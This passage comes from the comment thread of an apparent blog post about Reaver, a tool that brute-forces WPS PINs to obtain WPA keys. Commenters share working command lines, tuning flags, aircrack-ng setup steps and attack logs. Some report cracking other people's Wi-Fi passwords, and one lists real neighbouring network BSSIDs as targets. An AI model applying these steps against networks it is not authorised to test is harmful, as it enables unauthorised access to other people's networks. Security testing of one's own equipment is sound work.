    [+] warning: receive timeout occurred
    [+] 25 successive start failures
    [+] sending EAPOL HACK
    [+] WPS TRANSACTION FAILED (CODE: 0X02) re-trying last pin
    [+] trying pin 12345670
    [+] sending EAPOL START request

  65. Pingback: WarFlying: UAVs and Wi-Fi Hacking « cmu95752

  66. Manmilk says:

    Keep getting AP rate limiting every 5 pin tries for five mins; am at 10% after 24 hrs. Time’s no prob, but is there anything I can do to speed it up, and does reaver have to finish 100% first or can it find the pin at, say, 40%?

  67. surya says:

    admin
    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv
    switching to channel 1

    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXX-XXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXX-XXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXX-XXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXX-XXXX)
    [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXX-XXXX)

    I got this problem at my home network.

    What do I have to do?
    My adapter: ath9k (Atheros)
    Windows 7, 64 bit
    Intel i3 processor

  68. Shambool says:

    Wow, today for the first time I followed your tutorial and wrote about my experience; well, cracking WPA/2 has become super easy.
    reaver on ubuntu

  69. nick says:

    higher cower stronger cooler

  70. nick says:

    Hope you write a tool, reaver 9.9, that may connect two, three, nine network cards to brute force together.

  71. Pingback: I have no net Episode II – Cracking WPS/WPA(2) « Siwhine's blog

  72. reaverfan says:

    An amazingly simple and effective tool! A genuine, heartfelt thanks to the author and the guys who thought of looking at WPS. You’ve made me aware how vulnerable I am and I just replaced my router because of the knowledge I gained with this program. I have been tweaking the -d, -a, -N and -A options on several attempts at my router to discover how quickly it could fall. Is there a recommended guideline for the parameter values of these options given the operational environments (ie: signal power, AP feedback, etc.)?

  73. Jeyyson says:

    Hi guys. Using reaver to test my own AP. Installed reaver fine, but when it’s time to ./wash it can’t find wash.
    Any help would be appreciated.
    J

  74. Zainul says:

    Hi,

    It depends on what adapter you are using; for me the best adapter is the Alfa AWUS036H, RTL8187 chipset. From my experience……

  75. koktong92 says:

    Can Reaver crack WPA if my WPA password is not in digit form or is longer than 8 digits?

    • ewrfwf says:

      Reaver cracks WPS. If you have the WPS PIN activated and Reaver cracks it, the attacker gets the WPA key from the router.

      If you deactivate the WPS PIN mode, it isn’t possible to get your WPA key with this method.

  76. ANDREW says:

    GREAT WORK CRAIG!!!
    IS IT ALSO POSSIBLE TO DECODE THE WPA TKIP ROUTER? ’CAUSE I TRIED REAVER ON A WPA CCMP ROUTER AND IT WORKS… BUT WHEN I TRIED WPA TKIP IT’S NOT WORKING…
    THANKS!!!

  77. ewrfwf says:

    Use the parameter -S.
    It will increase speed through using small RSA keys.

  78. 24 hours working and nothing, just these messages. Any help?

    (!) WPS transaction failed (code: 0x02) re-trying last pin
    (!) WARNING 10 failed connections in a row
    (+)Trying pin 12345670
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (!) WARNING 25 sucessive start failures
    (+) Nothing done nothing to save
    (+) 0.00% complete @ date ( 0 seconds pin)
    (+)Trying pin 12345670
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (+)Sending EAPOL START request

    • Craig says:

      Reaver can’t establish an EAP session with the AP. Either the AP is ignoring EAPOL START packets (MAC filtering?) or you need to get a better signal from the AP.

  79. Zulkarnain says:

    Here you can get Beini. No need for a dictionary to crack WPA. I will update new Beini; just keep checking my blog: http://karnaintrack.org/2012/04/beini-1-2-3-iso/

  80. David says:

    @Craig What is a solid sec/pin to fall into the 10 hour window? I’m playing around with this now and I have 13% after 6 hours at 25 sec/pin… I’m assuming this is slow? What metric would you want to see here?

  81. BB287$ says:

    I had a lot of the same issues as some of you have. I disabled monitor mode (airmon-ng stop wlan0); for some reason mon0 still shows up, so then (airmon-ng stop mon0), then check to make sure wlan0 is the only adapter showing (airmon-ng). After disabling monitor mode, run Reaver using wlan0 instead of mon0. Worked perfectly for me without monitor mode.

  82. blah says:

    Try reaver -i mon0 -b (bssid) -vv --no-nacks

  83. Adrian says:

    It is even easier to use Reaver with Inflator. All you need to do is click a few buttons :) SEE HERE

  84. JT says:

    I was wondering if someone could please tell me if Reaver must make it to 100%, or will it give the information sooner if it finds the right pin?
    I have a slow connection (low power; I have a bet with my neighbour) and I’m at 33% after a few days. It would be nice to know that if it finds the correct pin at, let’s say, 40%, it will give the code instead of going all the way to 100%.

    • Crispy says:

      I found the pin at 13113 sec on the first attempt; I think that was about 30%. But now I’m trying another AP which has the 5 min rate limiting thing after a few pins tried, and now after 18 hrs, at 93%, still no pin found yet. But I have my fingers crossed.

  85. helmi says:

    Hey, can I use the Linksys WUSB54G v1 / v4 to do this?
    Thanks :)

  86. helmi says:

    I’m using rt2500usb; is it compatible with Reaver? Thanks.. :)

  87. JoeyD says:

    Unbelievable. I read up on Reaver, noted the command line entries I needed. Took time to download BackTrack 5 R2, burn it to a DVD and set up.
    Ran Reaver and it began scrolling but stopped immediately, before even reaching the bottom of the terminal screen. Thinking it failed, I checked to see the error and, lo and behold, it was showing the pin and password… found it in 3 seconds! Pin was 12345670, by the way.

    • Craig says:

      The 12345670 pin has been found to be the default for several different vendors/ISPs, so it is the first one that Reaver tries. :)

  88. Matt says:

    So should I use mon0 or wlan0? Some comments say mon0 and others wlan0.

  89. keko says:

    I started to test this 6 months ago, so I have already obtained 4 passwords (WPA2) :)) so just be patient, guys..

  90. five stars says:

    Greetings! Very useful advice in this particular post!
    It’s the little changes that make the largest changes. Many thanks for sharing!

  91. Bla says:

    Version 1.4 worked for me. Had an ARRIS router with WPS. Used Wireshark and Edit/Find on the “wps” string in packet details to make sure of WPS. Took about 12 hours at 6pin/sec. Signal strength from airodump-ng shows PWR 88 RXQ 80.

    If it just sits there, it probably means your router doesn’t have WPS and won’t work. Thanks, developer!

  92. Oskar says:

    [+] Waiting for beacon from aa:bb:cc:dd:ee:ff
    [+] Associated with 00:11:22:33:44:55 (ESSID: XYZ)

    Stays like this forever.

    I left it 10 hours and nothing…

  93. sunsun says:

    I have the same problem as you, and I want to know how to reload a session if I run BT from a DVD.

    • Craig says:

      You’ll have to copy the session files (stored in /usr/local/etc/reaver) to a USB drive or some other storage medium before shutting down BT, as there is no way to save data to the DVD.

  94. MSG says:

    Using version 1.4 to crack a Netgear WPA secured router. Man, it is taking FOREVER. The problem with Reaver is when you start to attack routers with timeout values. It will get into a situation where there is a minimum timeout after so many attempts before it lets Reaver rechallenge WPS. After 10 failed attempts, I set -x = 250 seconds. That’s over 4 minutes. So, it has taken me over 8 hours just to get to 18% of the pins. Worst case estimate is it takes about 45+ hours to finish. That’s a lot better than a straight dictionary attack, but it is way worse than 10 hours. Don’t delude yourself into thinking Reaver will crack WPA in 10 hours or less. Also, lots of routers do not have WPS enabled or supported. For the newbies, you should use wash to figure out which APs and routers support WPS.

    Finally, some routers will lock down WPS after too many failed attempts. So, just so people know, Reaver is not the end-all. It is just another tool in the lockpicker’s arsenal. Personally, I think a better way would be to do a man-in-the-middle attack.

    • Craig says:

      Yes, if the AP rate limits you, the attack will take longer. Most APs don’t, but Netgear is the exception. And yes, some completely lock you out after X number of attempts. I don’t think anyone is deluding themselves here; this is all documented behavior, and why Reaver has options like -x.

      Yes, a lot of APs don’t support WPS, but they are typically fairly old APs. Pretty much anything made within the last 4-5 years will have WPS support on by default (it’s very rare to see people actively disable WPS). The number of WPS enabled APs will only rise in the future.

      Good luck with a MITM attack. If that actually worked people would have been doing it for years now.

  95. akitta says:

    I cracked my friend’s router (with permission) with Reaver in 3335 secs, 2 sec/pin.
    My own router is still at 8%, as it’s rate limiting every 5 attempts.
    I will try with --ignore-locks next.

  96. hans88 says:

    Why, when I start cracking some wifi using Reaver, is it not running as usual? The percentage actually stays at 0.00%. But when I try to connect with another laptop and try some key, the percentage of Reaver is working, but slowly. Please answer my question. :(

  97. hans88 says:

    24 hours working and nothing, just these messages. Any help?

    (!) WPS transaction failed (code: 0x02) re-trying last pin
    (!) WARNING 10 failed connections in a row
    (+)Trying pin 12345670
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (!) WARNING 25 sucessive start failures
    (+) Nothing done nothing to save
    (+) 0.00% complete @ date ( 0 seconds pin)
    (+)Trying pin 12345670
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (+)Sending EAPOL START request

    Please answer, Craig… the signal is good. I don’t know what the problem is..

    • bla says:

      From my experience, it can time out with a good signal if there are multiple APs on the same channel interfering with each other. Signal strength isn’t always as it seems when it comes to interference, multipath, etc.

    • Greg says:

      Show what commands you run???

  98. juanito says:

    I wonder how well I can install the tool wpscrack on BackTrack 5 R3, like Reaver, and bring it along without having to install it. Please help me. Thank you very much for this tool, as good as Reaver, but it takes a while to give me my WPA on my router, and for this reason I would like to try this tool. Greetings…

  99. hackkary says:

    We have been trying reaver-1.4 for 2 weeks with my friends and we have 3 cracked Wi-Fi passwords already. But my question is:
    when I set the command [ wash -i mon0 ] and get the targets with WPS Locked “yes”, is there anybody cracking the WPS locked Wi-Fi passwords? If yes, I would appreciate it if you showed any method.. Thanks…

  100. Mcld says:

    Interface Chipset Driver

    wlan1 Atheros AR9271 ath9k – [phy1]
    wlan0 Broadcom b43 – [phy0]

    root@bt:~# airmon-ng start wlan1

    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    2785 dhclient3
    2790 dhclient3
    Process with PID 2790 (dhclient3) is running on interface wlan0

    Interface Chipset Driver

    wlan1 Atheros AR9271 ath9k – [phy1]
    (monitor mode enabled on mon0)
    wlan0 Broadcom b43 – [phy0]

    airodump-ng mon0

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:26:4D:16:E4:67 -62 43 0 0 5 54e WPA TKIP PSK DARKANGEL_Netzwerk
    C0:25:06:A9:8C:62 -75 24 0 0 11 54e. WPA2 CCMP PSK FRITZ!Box Fon WLAN 7390
    68:7F:74:01:FA:FC -75 22 0 0 11 54 WPA2 CCMP PSK lufthaken
    C0:25:06:41:EE:4A -76 20 0 0 1 54e WPA2 CCMP PSK FRITZ!Box Fon WLAN 7112
    C0:25:06:DC:B0:A4 -77 21 0 0 1 54e. WPA2 CCMP PSK FRITZ!Box 6320 Cable

    BSSID STATION PWR Rate Lost Frames Probe

    (not associated) 54:26:96:84:0A:05 -71 0 – 1 38 27

    wash -i mon0 -C -s

    reaver -i mon0 -b 00:26:4D:16:E4:67 -c 5 -vv (WPS Locked =N)

    Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Nothing done, nothing to save.
    [+] 0.00% complete @ 2013-01-03 10:03:31 (0 seconds/pin)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response

    I am using a TP-LINK TL-WN722N.
    Tested injection and it works, but not getting any ARP.
    I have run this for the past 8 hrs and still getting the same response.
    Please can anyone point me to what I’m doing wrong, and how to get this thing working.

  101. Paul says:

    Hi Craig

    Do you know why reaver starts on 90% every time I try it?

  102. clickmac says:

    Hi, I am testing out my router, to see the vulnerability of it. And it appears my router is pretty damn awesome! I am using Reaver, and my command is “reaver -i mon0 -b **** -vv --no-nacks -A”, and I seem to be getting an error of “warning: receive timeout occurred” when sending the EAPOL start request. How can one get around this problem? I even tried -t .25 because it gives 25 warnings of timeout. Then finally it gets through, and sending WSC NACK… then I get the next error, WPS transaction failed (code: 0x02), re-trying last pin.. then the 25 warnings happen again, and the whole process repeats. How can I solve this? Thank you Craig and anyone else in advance for helping me.

  103. Etienne Ferreira says:

    Hi, can someone please help me. When I run the command for Reaver to start, it always starts around 90% and not 0%, and if it gets to 99% it just does the same number over and over.

  104. Zyxel says:

    Hi everyone,
    I had this error: “warning detected ap limiting waiting 60seconds befor re-checking”. How can I solve this issue??
    Thanks

  105. wilster_cisco says:

    This works for me:

    enable mon0
    airmon-ng start wlan0

    Check for the wps enabled wpa wifi : use command:
    #wash -i mon0 -C

    set your channel to the same as the AP in which you are interested
    #iwconfig mon0 channel

    start aireplay
    #aireplay-ng mon0 -1 120 -a -e

    start reaver
    #reaver -i mon0 -A -b -v

    or

    reaver -i mon0 -b (ssid) -T 1 -f -N -S 1 -vv

  106. shreeram says:

    It says [+] waiting for the beacon from 60:D8:19:21:63:91. Is it normal? I am not getting any other output. Should I wait? How long do I have to wait for the output to come?

  107. I used to be recommended this blog by means of my cousin.
    I’m not certain whether this publish is written by way of him as nobody else recognise such unique approximately my difficulty. You are incredible! Thanks!

  108. boat says:

    Can’t get past the locked router; each time I get AP rate limiting.
